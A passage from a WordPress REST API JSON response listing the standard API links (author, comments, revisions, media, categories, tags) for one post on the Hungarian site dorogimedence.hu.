s"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=31506"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/31506\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media\/31508"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=31506"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=31506"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=31506"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}